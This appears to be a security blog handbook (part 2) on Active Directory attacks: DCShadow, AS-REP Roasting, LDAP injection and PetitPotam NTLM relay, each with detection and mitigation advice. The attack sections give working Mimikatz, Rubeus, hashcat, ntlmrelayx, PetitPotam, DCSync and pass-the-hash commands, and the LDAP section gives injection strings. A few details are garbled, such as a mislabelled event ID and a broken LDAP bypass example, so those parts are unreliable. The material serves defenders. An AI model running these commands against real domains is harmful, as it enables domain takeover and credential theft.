---
title : 'The Complete Active Directory Security Handbook (Part-2)'
slug : 'complete-active-directory-security-handbook-2'
tags :
    - Personal
    - Web
    - Random Access Memories
    - Resource
    - Security
description : 'Exploitation, Detection, and Mitigation Strategies'
date : 2024-04-20
toc : true
scrolltotop : true
ShowLastmod : false
---
## Previous Part
[The Complete Active Directory Security Handbook (Part-1)]({{< ref "complete-active-directory-security-handbook-1.md" >}})

## DCShadow Attack
A DC Shadow attack involves compromising the Active Directory environment by introducinga rogue domain controller (DC) into the network and then replicating changes from thelegitimate domain controllers to the rogue one. The attack consists of six steps.

A DC Shadow attack is a type of attack on an Active Directory environment where an attackerintroduces a rogue domain controller (DC) into the network and replicates changes fromlegitimate domain controllers to it. The attacker first creates changes in the environment,such as adding new objects or modifying existing ones, and then waits for the changes to bereplicated to the legitimate domain controllers. They then register service principal names(SPNs) for the rogue DC and register it in the configuration namespace, allowing it toauthenticate and communicate with other domain controllers. The attacker triggers replication of the changes they made to the rogue DC, which replicates them, allowing thechanges to persist in the environment. Finally, the attacker deletes the SPNs and the rogue DC, covering their tracks and leaving the environment in a compromised state. This type ofattack allows the attacker to persist and control the network by making changes that arereplicated to other domain controllers.

### Tools and Techniques to Perform a DCShadow Attack
Adversaries often use Mimikatz as a tool to perform the DCShadow attack technique.

#### Tool 1: Mimikatz
Before we go any further, we need to make an assumption that the attacker has alreadycompromised the credentials of an Active Directory account with administrative permissions;let's assume the user is called Bob. The reason behind this assumption is that anadministrative account allows the adversary to make changes to the environment, such asadding a rogue domain controller and replicating changes from legitimate domain controllersto it. Without administrative access, the attacker would not be able to carry out the attack.

A typical DCShadow attack consists of two steps.

##### Step 1: Elevating to SYSTEM privileges and making changes to the replicatedobject
The first step involves starting the mimidrv service, which provides the necessary privilegesto play the role of a fake Domain Controller [^32]. These initial commands ("!+" and"!ProcessToken") register and start a service called "mimidrv" and elevates the privileges toSYSTEM.
```
PS> .\mimikatz.exe "!+ !ProcessToken"
```
Next, the adversary runs the following commands [^32], [^33].
```
mimikatz # lsadump::dcshadow
/object:"CN=Alice,OU=Employees,DC=sub,DC=domain,DC=com" /attribute:SidHistory
/value:S-5-1-5-21-2049251289-867822404-1193079966
. . .
** Starting server **
 > BindString[0]: ncacn_ip_tcp:<LocationOfFakeServer>[ThePortItListensTo]
> RPC bind registered
> RPC Server is waiting!
== Press Control+C to stop ==
```
This command is used to specify the fake server for a DCShadow attack.

The "/object" switch is used to specify the targeted user object, in this case the user “Alice”.The "/attribute" switch is used to specify the attribute that should be modified in the targetuser object, in this case "SidHistory". Finally, the "/value" switch is used to specify the newvalue for the specified attribute, in this case

"S-5-1-5-21-2049251289-867822404-1193079966".

In the context of a DCShadow attack, this command is used to specify the fake server andtarget the user object to modify its SidHistory attribute with the new specified value. Themodified attribute can be used to grant the attacker unauthorized access to the targetsystem and sensitive information.

##### Step 2: Pushing the changes back to a real domain controller
In the second step, the adversary has to launch Mimikatz again as the “Bob” account, whichthey compromised in the first place. The adversary runs the following command:
```
mimikatz # lsadump::dcshadow /push
```
The command lsadump::dcshadow /push is expected to perform a DCShadow attack byregistering a fake domain controller (shadowDC) and pushing replication data to it. The aimof this attack is to modify the contents of Active Directory database by using the roguedomain controller. Once the replication data has been committed, the fake domain controlleris unregistered for cleanup purposes.

Once everything is done, the attacker logs out from the compromised account Bob, andlogin again to gain the updated access token with the modified SID history.

### Detection Methods for the ShadowDC Attack
The only definitive way to identify a DCShadow attack is through network monitoring of DRSUAPI Remote Procedure Call (RPC) requests for the DRSUAPI_REPLICA_ADD operationthat originate from systems that are not known to be domain controllers. Another method ofdetecting DCShadow is through analyzing Windows event logs, but this approach onlyprovides signs of the attack and not the exact changes made by the attacker.

In order to mimic a domain controller, DCShadow must make changes in Active Directory,such as adding a new NTDSDSA object and a global catalog `(GC/<host>)servicePrincipalName` to a computer object that is not a known domain controller. After theattack is completed, both of these items will be removed.

By examining events 5136 and 5141 in the Windows event log's Audit Directory Service Changes subcategory ([^34], [^35]), you can look for evidence of the creation and deletion ofserver objects within sites.

**Event ID 5136**- The Windows Filtering Platform has allowed a connection.
* Key Description Fields: Security ID, Account Name, Account Domain, Logon ID

**Event ID 5141** - A directory service object was deleted.
* Key Description Fields: Security ID, Account Name, Account Domain, Logon ID

### Mitigation Techniques for the DCShadow Attack
DCShadow attack is a type of advanced persistent threat (APT) that leverages features andprivileges of Active Directory (AD) to modify data in a malicious manner. As it is not possibleto fully eliminate the risk of this attack, it is important to adopt a multi-layered securityapproach to mitigate it. Here are some suggestions that can help you reduce the risk of asuccessful DCShadow attack:

##### Mitigation Technique 1: Implementing firewall policies
Use host-based firewalls to limit lateral movement. Ensure that remote managementprotocols such as RDP are only accessible from a small set of approved and monitored systems.

##### Mitigation Technique 2: Limit user privileges
It is essential to limit the number of users with administrative privileges across security boundaries. This helps to minimize the extent to which an attacker can escalate their privileges.

##### Mitigation Technique 3: Control access to computer objects
Constrain the number of users with permission to add computer objects to the ActiveDirectory. This helps to prevent unauthorized changes to the AD infrastructure.

##### Mitigation Technique 4: Reduce delegated administrative permissions
Adequately govern built-in privileged groups and delegated administrative permissions toreduce the risk of abuse.

##### Mitigation Technique 5: Maintain good Active Directory hygiene
Regularly removing unused sites and computer objects helps maintain good Active Directoryhygiene and reduces the attack surface.

By following these mitigation strategies, organizations can better protect themselves againstDCShadow attacks and other types of advanced persistent threats.

## AS-REP Roasting
The AS-REP Roasting technique enables attackers to acquire password hashes of useraccounts that have deactivated Kerberos pre-authentication. This method entailstransmitting an Authentication Server Request (AS-REQ) message to the domain controller(DC). If pre-authentication is disabled, the DC will return an AS-REP message containingencrypted data, including a segment encrypted with the user's password hash. Subsequently,the attacker can utilize this information to attempt cracking the user's password offline.

Under normal circumstances, with pre-authentication activated, the user initiates the Kerberos authentication procedure by dispatching an AS-REQ message to the DC. Thismessage is encrypted with a timestamp, which is further encrypted with the hash of theuser's password. If the DC successfully decrypts the timestamp using its stored record ofthe user's password hash, it will reply with an AS-REP message comprising a Ticket Granting Ticket (TGT), issued by the Key Distribution Center (KDC). The user then employs this TGT forfuture access requests.

### Tools and Techniques to Perform an AS-REP Roasting Attack
Adversaries can use various third-party tools to perform an AS-REP Roasting Attack, such as Rubeus and Empire, Kerbrute and Impacket.

#### Tool: Rubeus

In order to find all accounts that do not require pre-authentication and extract their AS-REPhashes for offline cracking, an adversary runs the following command.
```
Rubeus.exe asreproast
```
To make the attack go a few steps forward, the attacker can leverage some parameters toextract the data in a format that can be cracked offline by, for instance, Hashcat:
```
Rubeus.exe asreproast /format:hashcat /outfile:C:\Temp\hashes.txt
```
Notice that the output hash credentials are written to the file called hashes.txt in the Tempdirectory. Next, the adversary leverages the Hashcat, specifying the hash-mode code for AS-REP hashes (18200), a hash file, and a dictionary to use to perform the brute-forcepassword guessing.
```
hashcat64.exe -m 18200 c:\Temp\hashes.txt dictionary.dict
```
To gain a better understanding of the AS-REP Roasting attack and how it is performed by using other tools, you can visit here [^36].

### Detection Methods for the AS-REP Roasting Attack
Detection of AS-REP Roasting attacks is crucial in order to mitigate the risk of passwordtheft. One way to detect such attacks is to monitor for changes to the setting that controlswhether Kerberos preauthentication is enabled.
**Event ID 4738** - A user account was changed.
* Key Description Fields: Security ID, Account Name, Account Domain, Logon ID,Security ID, Account Name

For instance, in the course of such an attack, Event ID 4738 is generated. This event signifiesa Kerberos authentication service ticket request and encompasses parameters such as Ticket Encryption Type (0x17), Ticket Options (0x40800010), and Service Name (krbtgt). Thepresence of these parameters in the event logs may indicate an ongoing AS-REP Roastingattack, as this event is produced when the attacker manipulates domain objects [^37].

**Event ID 5136** - A directory service object was modified.
* Key Description Fields: Security ID, Account Name, Account Domain, Logon ID, DN, GUID, Class, LDAP Display Name

Another option is to monitor Event ID 5136, which provides information about changes made to user accounts within a Windows environment. By analyzing the logs from this event, it is possible to identify any user accounts that have had the setting for Kerberos pre-authentication changed.

### Mitigation Techniques for the AS-REP Attack
There are a couple of techniques that you can perform to mitigate an AS-REP attack.

#### Mitigation Technique 1: Locating all user accounts
The most effective way to prevent AS-REP Roasting attacks is to locate all user accounts that are configured without requiring Kerberos pre-authentication and enable this setting. This can be done by using the following script [^38]:
```
Get-ADUser -Filter * -Properties DoesNotRequirePreAuth | Where-Object{$_.DoesNotRequirePreAuth -eq $True -and $_.Enabled -eq $True} | Select-Object'SamAccountName','DoesNotRequirePreAuth' | Sort-Object 'SamAccountName'
```
The script uses the Get-ADUser cmdlet with a filter to find all user accounts, and it specifiesthe 'DoesNotRequirePreAuth' property in the 'Properties' parameter to retrieve thepre-authentication information for each account.

The output of the Get-ADUser cmdlet is then piped to the Where-Object cmdlet, which filtersthe results to only include accounts where 'DoesNotRequirePreAuth' is equal to $True and'Enabled' is equal to $True. The filtered results are then passed to the Select-Object cmdlet,which selects the 'SamAccountName' and 'DoesNotRequirePreAuth' properties for eachaccount. Finally, the selected results are passed to the Sort-Object cmdlet, which sorts theresults by the 'SamAccountName' property.

By enabling Kerberos pre-authentication for these user accounts, it ensures that the domaincontroller can decrypt the timestamp encrypted with the hash of the user's password. Thismakes it much more difficult for an attacker to gain access to the user's password hash andcarry out an offline cracking attack.

#### Mitigation Technique 2: Implementing a strong password policy
To guard against AS-REP Roasting attacks, it is advisable to implement strong password policies, especially for privileged accounts, that mandate the use of lengthy and complicated passwords. This makes it challenging for an attacker to crack the passwords, even if they are successfully stolen. Implementing fine-grained password policies is an effective first step toward ensuring password security.

#### Mitigation Technique 3: Finding out the Active Directory privileges
It's important to identify who has the authority to change the preauthentication setting, as they could temporarily disable it to steal the AS-REP hash and then re-enable it. The following query will show all individuals with access rights to accounts without preauthentication [^39]:
```
(Get-ACL "AD:\$((Get-ADUser -Filter 'useraccountcontrol -band4194304').distinguishedname)").access
```
The code retrieves the access control list (ACL) of the security descriptor associated with aspecific user object in Active Directory (AD).

It first filters all user accounts in AD where the "useraccountcontrol" value has the 4194304decimal bit set (which corresponds to the flag UF_DONT_REQUIRE_PREAUTH in theuserAccountControl attribute) and retrieves their distinguished name. Then it retrieves the ACL of the security descriptor of the first user account in the result set using thedistinguished name and stores it in a variable. The last line of code retrieves the accessproperty of the ACL and displays it, which represents the access rights that are granted ordenied to the security principals specified in the ACL for the target user object.

## LDAP Injection Attack
LDAP, an abbreviation for Lightweight Directory Access Control Protocol, is an open-sourceapplication protocol used for directory services authentication. In other words, LDAPbehaves like a cross-platform that maintains a communication language for applications thatcommunicate with other directory services, which store information about objects and sharethis information with other entities on the network. One thing to note is that LDAP and Active Directory are not the same; in fact, LDAP is the language that Microsoft Active Directory (AD)understands. So, if you ever need to access or authenticate yourself to any data stored onAD, you use LDAP to communicate with the target server.

An LDAP query, on the other hand, is the command that asks a particular directory servicefor the information you requested.

{{< admonition info >}}
In default, you, as a non-privileged valid account in AD, can use LDAP queries to gain various critical information. For instance, if you want to list all users with “Password never expires option” enabled, then you run the following LDAP query:
```
(objectcategory=user)(userAccountControl:1.2.840.113556.1.4.803:=65536)
```
{{< /admonition >}}
LDAP injection is a type of vulnerability that allows an attacker to inject malicious code intoan LDAP query. This can result in unauthorized access to sensitive information stored in the LDAP directory or manipulation of the data stored in the directory. LDAP injection attacksoften occur due to a lack of proper input validation and sanitization on the client side,where user-controlled values are directly appended to the LDAP search filter. Attackers canexploit this vulnerability by injecting special characters into the query, which changes itsintended meaning and allows the attacker to bypass authentication controls or retrieve sensitive information.

### Techniques to Perform an LDAP Injection Attack
LDAP injection attacks come in many forms, and some of them are covered in this text. If you would like to delve deeper into the subject and learn about additional types of LDAP injection attacks that are not mentioned here, please follow this link [^40].

#### LDAP Injection Type 1: Privilege escalation

The issue of the Elevation of Privileges refers to the situation where low-security level userscan gain access to high-security level information. This is achieved through the use of aninjection in the form of a filter that the LDAP server processes.

For example, the attacker can target a directory with documents of low-security level, suchas "Information/Reports" and "Information/UpcomingProjects".

The injection, in this case, would look like the following:
```
"Information)(security_level=*))(&(directory=documents"
```
The filter resulting from this injection would be the following.
```
(&(directory=Information)(security_level=*))(&(directory=Information)(security_level=low))
```
As the LDAP server processes only the first filter, the second filter gets ignored, and the query that gets executed is "(&(directory=Information)security level=*)". This allows the attacker to gain access to a list of documents that would otherwise only be accessible to users with a high security level, even though the attacker does not have the proper privileges.

#### LDAP Injection Type 2: Access control bypass

All login pages contain two fields for user input, one for the username and another for thepassword. The inputs are labeled as USER (username) and PASSWORD (password). Theclient provides a username/password pair and LDAP confirms the existence of this pair byconstructing search filters and sending them to the LDAP server.

The filter is written as (&(USER=Alice)(PASSWORD=PaSsW0rd!+). However, an attacker canmanipulate this by entering a valid username and injecting a sequence after it, effectivelybypassing the password check. By knowing the username, the attacker can enter any stringas the password value, resulting in the following query being sent to the server:(&(USER=Alice)(PASSWORD=PaSsW0rd!+).

The LDAP server only processes the first filter, ignoring the second one, which allows theattacker to enter the system without a proper password as the query (&(USER=Alice)(&)) isalways correct.

#### LDAP Injection Type 3: Information disclosure

A resource explorer allows a user to see what resources are available on the system, such asa website that sells clothing. For example, a user can search for a specific item, such asnotebooks or stickers, to see if they are available for sale. This is done using an LDAP query,such as: (|(type=Notebooks)(type=Stickers)).

However, a hacker can exploit this by injecting the string "uid=*" into the query, resulting inthe following query: (|(type=Notebooks)(uid=*))(type=Stickers)).

This query will be processed by the LDAP server, displaying not only all the available jeansbut also all the user objects in the system.

### Mitigation Techniques for an LDAP Injection Attack
There are a couple of mitigation techniques to prevent a possible LDAP Injection attack [^41].

#### Mitigation Technique 1: Escaping all variables using the right LDAP encoding
Escaping all variables using the right LDAP encoding is one of the key mitigation techniques against LDAP injection attacks. This technique involves encoding all user-supplied input in a way that makes it difficult for attackers to inject malicious payloads into LDAP queries.

#### Mitigation Technique 2: Distinguished name escaping
LDAP uses DN, or Distinguished Name, to store and identify names in its database. A DN acts like a unique identifier, similar to a username, and can be used to access resources.

A DN is made up of multiple parts, separated by commas. For example, a DN could look like this [^41]:
```
cn=Richard Feynman, ou=Physics Department, dc=Caltech, dc=edu
```
Certain characters in a DN are considered special characters and need to be properly escaped or handled to avoid issues with the DN. The exhaustive list of special characters in a DN includes \ # + < > , ; " = and leading or trailing spaces.

However, there are also "special" characters that are allowed in Distinguished Names and do not need to be escaped. These include * ( ) . & - _ [ ] ` ~ | @ $ % ^ ? : { } ! '.

It's important to properly handle special characters in a DN to ensure that the DN functions as expected and to avoid any issues or unintended consequences when using the DN.

#### Mitigation Technique 3: Search filter escaping
In the LDAP database, each DN, or Distinguished Name, uniquely points to a single entry, which can be thought of as a row in a relational database management system (RDBMS). Each entry contains one or more attributes, similar to columns in an RDBMS. Search filters can be used to search through the LDAP database and find entries with specific attributes.

Search filters use Polish notation, also known as prefix notation, to specify the conditions for the search. For example, the following search filter would return all entries in the Physics organizational unit that have Freeman Dyson or Albert Einstein as their manager [^41].
```
(&(ou=Physics)(|(manager=cn=Freeman
Dyson,ou=Physics,dc=Caltech,dc=edu)(manager=cn=Albert
Einstein,ou=Physics,dc=Princeton,dc=edu)))
```
When building LDAP queries in application code, it's crucial to escape any untrusted datathat is added to the query to prevent security issues. There are two forms of LDAP escaping:encoding for LDAP search and encoding for LDAP DN. The proper form of escaping dependson whether the data is being used in a search filter or as a DN as a credential for accessinga resource.

Special characters such as "(", ")", and "" must be properly escaped when used in asearch filter to ensure the query is executed as intended. To learn more about search filterescaping, visit the RFC4515 document [^42].

#### Additional Defenses

To provide an additional layer of protection against LDAP injection attacks, organizations canimplement the following defense measures:

**Least Privilege**: Limit the privileges assigned to the LDAP binding account, which is theaccount used for accessing the LDAP directory, to minimize the potential damage in case ofa successful attack.

**Enable Bind Authentication**: Configure the LDAP protocol to require bind authentication,which verifies and authorizes valid credentials passed by the user [^43]. However, attackersmay still be able to bypass bind authentication through Anonymous Bind [^44] andUnauthenticated Bind [^45]. Hence, these Bind options also should be disabled.

**Allow-List Input Validation**: Implement input validation techniques to detect and preventunauthorized input from being passed to the LDAP query. This can help ensure that onlyapproved values are used in the construction of LDAP queries, reducing the risk of asuccessful LDAP injection attack. These validation techniques may include using regularexpressions, data type, and length restrictions, and cross-reference checks against externallists or databases [^46].

## PetitPotam NTLM Relay Attack on a Active Directory Certificate Services (AD CS)
The PetitPotam NTLM relay attack is a type of cyberattack that takes advantage of thelegacy protocol Windows NTLM and the MS-EFSRPC protocol. This attack takes advantageof the insecure default configuration of the Active Directory Certificate Services (AD-CS),which does not enforce Extended Protection for Authentication (EPA).

In this attack, an attacker can trigger a domain controller authentication by exploiting the PetitPotam vulnerability and relaying it to the AD-CS server to request a certificate for thedomain controller account. Using this certificate, the attacker can then retrieve a TGT(Ticket Granting Ticket) for the relayed domain controller account and perform any furtheroperations using its high privileges. This can lead to a full domain compromise in a few stepsand potentially allow the attacker to dump domain admin hashes.

It's important to note that this vulnerability was partially mitigated by a security updatereleased by Microsoft on Patch Tuesday, May 10, 2022, but an attack is still possible if anattacker has any Active Directory account credentials.

### Techniques to Perform a PetitPotam NTLM Relay Attack on Active Directory Certificate Services (AC DC)

In the following scenario, we are going to demonstrate how an adversary can exploit the PetitPotam vulnerability to obtain full domain administrator privileges without requiring a prior authentication.

A typical PetitPotam NTLM Relay attack consists of five steps [^47].
#### Step 1: Relaying the AD DC web enrollment page
In the first step, the attacker has to ensure that Impacket’s ntlmrelay.px is set-up to relay to the AD DC Web Enrollment page.

```
sudo python3 ntlmrelayx.py -debug -smb2support --target
http://<target-ip>/certsrv/certfnsh.asp --adcs --template KerberosAuthentication
…
[*] Setting up SMB Server
[*] Setting up HTTP Server
[*] Setting up WCF Server
[*] Servers started, waiting for connections
```
Note that the flag "--target" specifies the target URL to attack. In this case, the target is acertificate server endpoint. The flags "--adcs" and "--template KerberosAuthentication" indicate that the target is an Active Directory Certificate Services (ADCS) server and thatthe tool will use a specific authentication template. The flags "-debug" and "-smb2support" are for debugging purposes and for supporting SMB version 2, respectively.

#### Step 2: Exploiting the PetitPotam vulnerability

To exploit the PetitPotam vulnerability, we both need to specify the DC and the attacker IP.

PetitPotam.py can be downloaded from its official GitHub repository [^48].
```
python3 Petitpotam.py <listener-ip> <target-ip>
```
Note that while the listener-ip is the attacker’s relay IP, the target-ip is the IP of the DC that the attacker is targeting. Once the adversary exploits the PetitPotam vulnerability, the credentials would be relayed to the AD CD, where the certificate will be enrolled.

```
... #See the first step.
[*] Servers started, waiting for connections
...
[*] GOT CERTIFICATE!
[*] Base64 certificate of user DC-101$:
MIIRXQIBAz...LUSHLJCNIKmzEStB/3еу<ZKk31GbxwDU8t8wtx0YayLkKaJB5/c/tanzuJ10r08obkt
/nzJeyQxgyurLwrPp8HAUYnBCG3vwBUkzxbxotRtlnHrzztzVc/SA....
```
#### Step 3: Obtaining a Ticket Granting Ticket (TGT)
Now that it is enrolled, the attacker can use this certificate to obtain a Ticket Granting Ticket (TGT). For this step, the attacker can leverage the kekeo or Rubeus tool [^49]:
```
Kekeo # base64 /input:on
. . .
Kekeo # tgt::ask /pfx:<base64 cert from relay> /user:DC-101$
/domain:EXAMPLE.local /ptt
```
This command successfully authenticates the adversary with the domain.

#### Step 4: DCSyncing the target user
In this step, the attacker can use Mimikatz to perform a DCSync attack on the krbtgt user.
```
lsadump::dcsync /domain:EXAMPLE.local /user:krbtgt
```
Note that with the command the attacker is specifying the domain to target ("EXAMPLE.local") and the user to impersonate ("krbtgt"), which is a privileged account in Active Directory that is used to perform various administrative tasks, including issuing Kerberos tickets.

“lsadump::dcsync” function, on the other hand, is used to perform a "DCSync" attack, whichis a type of attack that allows an attacker to simulate the behavior of a Domain Controllerand retrieve password hashes, Kerberos tickets, and other sensitive information from the Active Directory database. Hence, upon running this command, the adversary gains thepassword hash of the krbtgt user: 186c026974e59a14040dbc63aa8fb8c4.

#### Step 5: Passing the hash

In this step, the adversary can use Impacket’s wmiexec.py tool to pass the hash that theyobtained from the fifth step to obtain an interactive shell on the Domain Controller.
```
wmiexec.py -hashes :186c026974e59a14040dbc63aa8fb8c4 EXAMPLE/krbtgt@<target-ip>
```
In simpler terms, these two bugs work together to quickly allow someone with limitedaccess to gain complete control over a network or system. Even if the network or system isfully updated with the latest security patches, these bugs can still be used to cause serious harm in just a few minutes.

### Mitigation Techniques for a PetitPotam NTLM Relay Attack on active Directory Certificate Services (AD CS)

To secure networks against NTLM Relay Attacks, domain administrators must take steps toprotect NTLM authentication-enabled services. The PetitPotam threat exploits servers thatlack safeguards for NTLM Relay Attacks in Active Directory Certificate Services (AD CS). This mitigation guidance provides steps for AD CS customers to protect their servers fromthis type of attack.

If you are using AD CS with the following services, your network may be vulnerable:
* Certificate Authority Web Enrollment
* Certificate Enrollment Web Service.

Microsoft suggests the following steps to mitigate potential attacks on AD CS servers [^50]:

**Step 1**: Enable Extended Protection for Authentication (EPA) for Certificate Authority Web Enrollment and Certificate Enrollment Web Service. This can be done through the Internet Information Services (IIS) Manager, with "Required" being the recommended and most secure option.

**Step 2**: Update the Web.config file created by the Certificate Enrollment Web Service role,located at `<%windir%>\systemdata\CES<CA Name>_CES_Kerberos\web.config`, to reflect theselected EPA setting.

**Step 3**: This can be done by adding `<extendedProtectionPolicy>` with a value of either"WhenSupported" or "Always", depending on the EPA setting in the IIS UI. The "Always" setting should be used when the EPA setting is set to "Required".

**Step 4**: Enable SSL-only connections by enabling the "Require SSL" option in IIS Manager.

**Step 5**: After completing these steps, it is important to restart IIS to load the changes. This can be done by opening an elevated Command Prompt window, and typing the following command:
```
iisreset /restart
```
Note that this command stops all IIS services, and then restarts them.

For more information on the available options for `<extendedProtectionPolicy>`, refer to the `<transport>` of `<basicHttpBinding>`. A sample configuration is provided [^50]:
```
<binding name="TransportWithHeaderClientAuth">
 <security mode="Transport">
 <transport clientCredentialType="Windows">
 <extendedProtectionPolicy policyEnforcement="Always" />
 </transport>
 <message clientCredentialType="None" establishSecurityContext="false"
negotiateServiceCredential="false" />
 </security>
 <readerQuotas maxStringContentLength="131072" />
</binding>
```
## Conclusion

In conclusion, the increasing frequency and sophistication of attacks targeting Active Directory are evident. The common attacks discussed in this report, such as Pass the Hash, Pass the Ticket, Kerberoasting, Golden Ticket, DC Shadow, AS-REP Roasting, LDAPInjection, and PetitPotam NTLM Relay Attack, exemplify the myriad ways adversaries canexploit vulnerabilities within an organization's Active Directory infrastructure.

Considering the crucial role Active Directory plays in regulating access to anorganization's sensitive data and resources, it is imperative for organizations to adoptproactive measures to defend against these types of attacks. This necessitates amulti-layered approach, incorporating regular security audits, vulnerability assessments,and continuous monitoring to detect and address threats in real time.

It is crucial to recognize that attackers constantly adapt their tactics, requiringorganizations to remain vigilant and consistently update their security measures to stayahead of emerging threats. By investing in comprehensive security measures and closelymonitoring the evolving threat landscape, organizations can mitigate the risk of fallingvictim to an Active Directory attack.

## References
[^32]: [“Detecting a Rogue Domain Controller - DCShadow Attack”](https://www.sentinelone.com/blog/detecting-a-rogue-domain-controller-dcshadow-attack/)
[^33]: [“DCShadow Attack using Mimikatz”](https://www.netwrix.com/how_dcshadow_persistence_attack_works.html)
[^34]: [“5136(S): A directory service object was modified”](https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-513)
[^35]: [“Detecting Lateral Movement through Tracking Event Logs”](https://www.jpcert.or.jp/english/pub/sr/20170612ac-ir_research_en.pdf)
[^36]: [“AS-REP Roasting”](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/as-rep-roasting)
[^37]: [“How To Detect AS-REP Roasting With”](https://www.blumira.com/how-to-detect-as-rep-roasting/)
[^38]: [“AS-REP Roasting”](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/credential-access/steal-or-forge-kerberos-tickets/as-rep-roasting)
[^39]: [“Cracking Active Directory Passwords with AS-REP Roasting”](https://blog.netwrix.com/2022/11/03/cracking_ad_password_with_as_rep_roasting/)
[^40]: [“Complete Guide to LDAP Injection: Types, Examples, and Prevention”](https://brightsec.com/blog/ldap-injection/)
[^41]: [“LDAP Injection Prevention - OWASP Cheat Sheet Series”](https://cheatsheetseries.owasp.org/cheatsheets/LDAP_Injection_Prevention_Cheat_Sheet.html)
[^42]: [“RFC ft-ietf-ldapbis-filter: Lightweight Directory Access Protocol (LDAP): String Representation of Search Filters”](https://datatracker.ietf.org/doc/html/rfc4515)
[^43]: [“The LDAP Bind Operation”](https://ldap.com/the-ldap-bind-operation/)
[^44]: [“3.4 - Anonymous Bind on LDAP server should be disabled”](https://www.tenable.com/audits/items/TNS_Oracle_WebLogic_10_Security_Guide_Linux.audit:8bc4cb19c1fe0abfc3edcf804e7603f0)
[^45]: [“Why Active Directory LDAP Unauthenticated Binds Should Be Disabled, and How to Do It”](https://blog.devolutions.net/2021/03/why-active-directory-ldap-unauthenticated-binds-should-be-disabled-and-how-to-do-it/)
[^46]: [“Input Validation - OWASP Cheat Sheet Series”](https://cheatsheetseries.owasp.org/cheatsheets/Input_Validation_Cheat_Sheet.html)
[^47]: [“From Stranger to DA // Using PetitPotam to NTLM relay to Domain Administrato”](https://www.truesec.com/hub/blog/from-stranger-to-da-using-petitpotam-to-ntlm-relay-to-active-directory)
[^48]: [“GitHub - topotam/PetitPotam: PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions”](https://github.com/topotam/PetitPotam)
[^49]: [PetitPotam | NTLM Relay Attacks | AD CS | Mimikatz | Rubeus | Domain Takeover](https://www.youtube.com/watch?v=K0N90sI_GhI)
[^50]: [“KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)”](https://support.microsoft.com/en-gb/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429)